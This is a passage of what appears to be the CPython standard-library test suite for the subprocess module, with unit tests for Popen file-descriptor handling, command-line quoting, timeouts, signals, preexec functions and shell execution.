"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
    # This test is Linux-specific for simplicity, so that we at least have
    # some coverage. The underlying issue is not platform specific.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
            # This avoids hard-coding the errno value or the OS perror()
            # string and instead captures the exception that we want to see
            # below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
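        # Duplicate each fd so it can be restored later, remembering whether it
        # was inheritable at the time it was saved.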
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
        # avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
